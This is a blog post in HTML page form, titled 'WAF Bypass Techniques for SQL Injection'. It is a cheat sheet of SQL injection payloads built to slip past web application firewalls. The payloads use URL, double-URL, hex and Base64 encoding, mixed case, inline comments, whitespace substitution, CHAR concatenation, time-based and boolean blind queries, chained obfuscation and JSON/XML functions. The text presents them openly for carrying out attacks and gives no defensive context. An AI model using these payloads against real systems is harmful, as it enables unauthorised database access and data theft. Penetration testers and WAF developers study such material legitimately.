<!DOCTYPE html>
<html lang="en-us"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">WAF Bypass Techniques for SQL Injection | ByteShifters</title>
<meta property="og:title" content="WAF Bypass Techniques for SQL Injection | ByteShifters" />
<meta name="twitter:title" content="WAF Bypass Techniques for SQL Injection | ByteShifters" />
<meta itemprop="name" content="WAF Bypass Techniques for SQL Injection | ByteShifters" />
<meta name="application-name" content="WAF Bypass Techniques for SQL Injection | ByteShifters" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="en-us" />
<meta name="language" content="en-us" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2024-10-03T00:00:00Z />
    <meta property="article:published_time" content=2024-10-03T00:00:00Z />
    <meta property="og:url" content="https://byteshifters.com/posts/hacking/sql-injections/waf-bypass-techniques-for-sqli/" />

    
    <meta property="og:article:author" content="ByteShifters" />
    <meta property="article:author" content="ByteShifters" />
    <meta name="author" content="ByteShifters" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "WAF Bypass Techniques for SQL Injection",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2024-10-03",
        "description": "",
        "wordCount":  367 ,
        "mainEntityOfPage": "True",
        "dateModified": "2024-10-03",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "ByteShifters"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.122.0">

    
    <meta property="og:title" content="WAF Bypass Techniques for SQL Injection" />
<meta property="og:description" content="WAF Bypass Techniques for SQL Injection Below are various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection.
1. Using Encoding and Obfuscation URL Encoding %27%20UNION%20SELECT%20NULL,NULL,NULL-- Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.
Double URL Encoding %2527%2520UNION%2520SELECT%2520NULL,NULL,NULL-- Double encode the payload to evade more sophisticated detection mechanisms.
Hex Encoding &#39; UNION SELECT 0x61646D696E, 0x70617373776F7264 -- Use hexadecimal encoding for the payload to obscure the SQL commands." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://byteshifters.com/posts/hacking/sql-injections/waf-bypass-techniques-for-sqli/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-10-03T00:00:00+00:00" />
<meta property="article:modified_time" content="2024-10-03T00:00:00+00:00" />



    
    <meta name="twitter:card" content="summary"/><meta name="twitter:title" content="WAF Bypass Techniques for SQL Injection"/>
<meta name="twitter:description" content="WAF Bypass Techniques for SQL Injection Below are various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection.
1. Using Encoding and Obfuscation URL Encoding %27%20UNION%20SELECT%20NULL,NULL,NULL-- Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.
Double URL Encoding %2527%2520UNION%2520SELECT%2520NULL,NULL,NULL-- Double encode the payload to evade more sophisticated detection mechanisms.
Hex Encoding &#39; UNION SELECT 0x61646D696E, 0x70617373776F7264 -- Use hexadecimal encoding for the payload to obscure the SQL commands."/>


    
    <link rel="icon" type="image/png+xml" href="/icons/logo32.png">

    <link rel="canonical" href="https://byteshifters.com/posts/hacking/sql-injections/waf-bypass-techniques-for-sqli/">
    <link href="/style.min.a65edcf99b5d9c11dd8dc9c13f2e80eec76933d8449c8579cefe3c64191b71d4.css" rel="stylesheet">
    <link href="/code-highlight.min.3dea1c7a362e3a7df3392c75d19c1efa95b2e82aa030c322a07a6caf50cb8e9a.css" rel="stylesheet">

    
    <link rel="icon" type="image/png+xml" href="/icons/logo32.png">
    
    
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/logo32.png">
    




<link rel="manifest" href="https://byteshifters.com/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#cccccc">

    
    <link rel="icon" type="image/png"  sizes="32x32" href="/icons/logo32.png">

</head>
<body data-theme = "" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://byteshifters.com/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/contact/">
                        Contact
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">WAF Bypass Techniques for SQL Injection</h1>
                
                
                <div class="post-meta">
                    <time datetime="2024-10-03T00:00:00&#43;00:00" itemprop="datePublished"> Oct 3, 2024 </time>
                </div>
                
                
                <div class="tags-list"><a href="https://byteshifters.com/tags/hacking/">#Hacking</a>
                            <a href="https://byteshifters.com/tags/sql-injection/">#SQL Injection</a>
                            <a href="https://byteshifters.com/tags/waf/">#WAF</a>
                            </div>
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b></b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#waf-bypass-techniques-for-sql-injection">WAF Bypass Techniques for SQL Injection</a>
      <ul>
        <li><a href="#1-using-encoding-and-obfuscation">1. Using Encoding and Obfuscation</a>
          <ul>
            <li><a href="#url-encoding">URL Encoding</a></li>
            <li><a href="#double-url-encoding">Double URL Encoding</a></li>
            <li><a href="#hex-encoding">Hex Encoding</a></li>
          </ul>
        </li>
        <li><a href="#2-case-manipulation-and-comments">2. Case Manipulation and Comments</a>
          <ul>
            <li><a href="#mixed-case">Mixed Case</a></li>
            <li><a href="#inline-comments">Inline Comments</a></li>
          </ul>
        </li>
        <li><a href="#3-whitespace-and-special-characters">3. Whitespace and Special Characters</a>
          <ul>
            <li><a href="#using-different-whitespace-characters">Using Different Whitespace Characters</a></li>
            <li><a href="#concatenation-with-special-characters">Concatenation with Special Characters</a></li>
          </ul>
        </li>
        <li><a href="#4-sql-function-and-command-obfuscation">4. SQL Function and Command Obfuscation</a>
          <ul>
            <li><a href="#string-concatenation">String Concatenation</a></li>
            <li><a href="#using-sql-functions">Using SQL Functions</a></li>
          </ul>
        </li>
        <li><a href="#5-time-based-and-boolean-based-payloads">5. Time-Based and Boolean-Based Payloads</a>
          <ul>
            <li><a href="#time-based-blind-sql-injection">Time-Based Blind SQL Injection</a></li>
            <li><a href="#boolean-based-blind-sql-injection">Boolean-Based Blind SQL Injection</a></li>
          </ul>
        </li>
        <li><a href="#6-advanced-encoding-techniques">6. Advanced Encoding Techniques</a>
          <ul>
            <li><a href="#base64-encoding">Base64 Encoding</a></li>
            <li><a href="#custom-encoding-scripts">Custom Encoding Scripts</a></li>
          </ul>
        </li>
        <li><a href="#7-chaining-techniques">7. Chaining Techniques</a>
          <ul>
            <li><a href="#combining-multiple-bypass-techniques">Combining Multiple Bypass Techniques</a></li>
          </ul>
        </li>
        <li><a href="#8-leveraging-lesser-known-sql-features">8. Leveraging Lesser-Known SQL Features</a>
          <ul>
            <li><a href="#using-json-functions">Using JSON Functions</a></li>
            <li><a href="#using-xml-functions">Using XML Functions</a></li>
          </ul>
        </li>
      </ul>
    </li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <h2 id="waf-bypass-techniques-for-sql-injection">WAF Bypass Techniques for SQL Injection</h2>
<p>Below are various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection.</p>
<h3 id="1-using-encoding-and-obfuscation">1. Using Encoding and Obfuscation</h3>
<h4 id="url-encoding">URL Encoding</h4>
<pre tabindex="0"><code>%27%20UNION%20SELECT%20NULL,NULL,NULL--  
</code></pre><p>Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.</p>
<h4 id="double-url-encoding">Double URL Encoding</h4>
<pre tabindex="0"><code>%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--  
</code></pre><p>Double encode the payload to evade more sophisticated detection mechanisms.</p>
<h4 id="hex-encoding">Hex Encoding</h4>
<pre tabindex="0"><code>&#39; UNION SELECT 0x61646D696E, 0x70617373776F7264 --  
</code></pre><p>Use hexadecimal encoding for the payload to obscure the SQL commands.</p>
<h3 id="2-case-manipulation-and-comments">2. Case Manipulation and Comments</h3>
<h4 id="mixed-case">Mixed Case</h4>
<pre tabindex="0"><code>&#39; uNioN SeLecT NULL, NULL --  
</code></pre><p>Change the case of SQL keywords to avoid case-sensitive filters.</p>
<h4 id="inline-comments">Inline Comments</h4>
<pre tabindex="0"><code>&#39; UNION/**/SELECT/**/NULL,NULL --  
</code></pre><p>Insert comments within SQL keywords to break up recognizable patterns.</p>
<h3 id="3-whitespace-and-special-characters">3. Whitespace and Special Characters</h3>
<h4 id="using-different-whitespace-characters">Using Different Whitespace Characters</h4>
<pre tabindex="0"><code>&#39; UNION%0D%0ASELECT%0D%0A NULL,NULL --  
</code></pre><p>Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters.</p>
<h4 id="concatenation-with-special-characters">Concatenation with Special Characters</h4>
<pre tabindex="0"><code>&#39; UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --  
</code></pre><p>Use special characters and concatenation functions to dynamically build the payload.</p>
<h3 id="4-sql-function-and-command-obfuscation">4. SQL Function and Command Obfuscation</h3>
<h4 id="string-concatenation">String Concatenation</h4>
<pre tabindex="0"><code>&#39; UNION SELECT &#39;ad&#39;||&#39;min&#39;, &#39;pa&#39;||&#39;ss&#39; --  
</code></pre><p>Break strings into smaller parts and concatenate them to obscure the payload.</p>
<h4 id="using-sql-functions">Using SQL Functions</h4>
<pre tabindex="0"><code>&#39; UNION SELECT VERSION(), DATABASE() --  
</code></pre><p>Leverage SQL functions to manipulate and obfuscate the payload.</p>
<h3 id="5-time-based-and-boolean-based-payloads">5. Time-Based and Boolean-Based Payloads</h3>
<h4 id="time-based-blind-sql-injection">Time-Based Blind SQL Injection</h4>
<pre tabindex="0"><code>&#39; AND IF(1=1, SLEEP(5), 0) --  
</code></pre><p>Use time delays to infer information based on the response time.</p>
<h4 id="boolean-based-blind-sql-injection">Boolean-Based Blind SQL Injection</h4>
<pre tabindex="0"><code>&#39; AND IF(1=1, &#39;A&#39;, &#39;B&#39;)=&#39;A&#39; --  
</code></pre><p>Use conditional statements to alter the response based on true or false conditions.</p>
<h3 id="6-advanced-encoding-techniques">6. Advanced Encoding Techniques</h3>
<h4 id="base64-encoding">Base64 Encoding</h4>
<pre tabindex="0"><code>&#39; UNION SELECT FROM_BASE64(&#39;c2VsZWN0IHZlcnNpb24oKQ==&#39;) --  
</code></pre><p>Encode payloads using Base64 to bypass content filters.</p>
<h4 id="custom-encoding-scripts">Custom Encoding Scripts</h4>
<p>Develop custom scripts to encode and decode payloads in different formats to evade detection.</p>
<h3 id="7-chaining-techniques">7. Chaining Techniques</h3>
<h4 id="combining-multiple-bypass-techniques">Combining Multiple Bypass Techniques</h4>
<pre tabindex="0"><code>%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A  
</code></pre><p>Combine various techniques to create more complex and harder-to-detect payloads.</p>
<h3 id="8-leveraging-lesser-known-sql-features">8. Leveraging Lesser-Known SQL Features</h3>
<h4 id="using-json-functions">Using JSON Functions</h4>
<pre tabindex="0"><code>&#39; UNION SELECT json_extract(column_name, &#39;$.key&#39;) FROM table_name --  
</code></pre><p>Leverage JSON functions to manipulate and extract data in a more complex manner.</p>
<h4 id="using-xml-functions">Using XML Functions</h4>
<pre tabindex="0"><code>&#39; UNION SELECT extractvalue(1, &#39;version()&#39;) --  
</code></pre><p>Utilize XML functions to construct more sophisticated payloads.</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="index.xml" target="_blank" rel="noopener noreferrer me"
    title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a>
</div>
    <small class="footer_copyright">
        
        byteshifters.com
        
    </small>
</footer><a href="#" title="" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    






    
    <script src="https://byteshifters.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
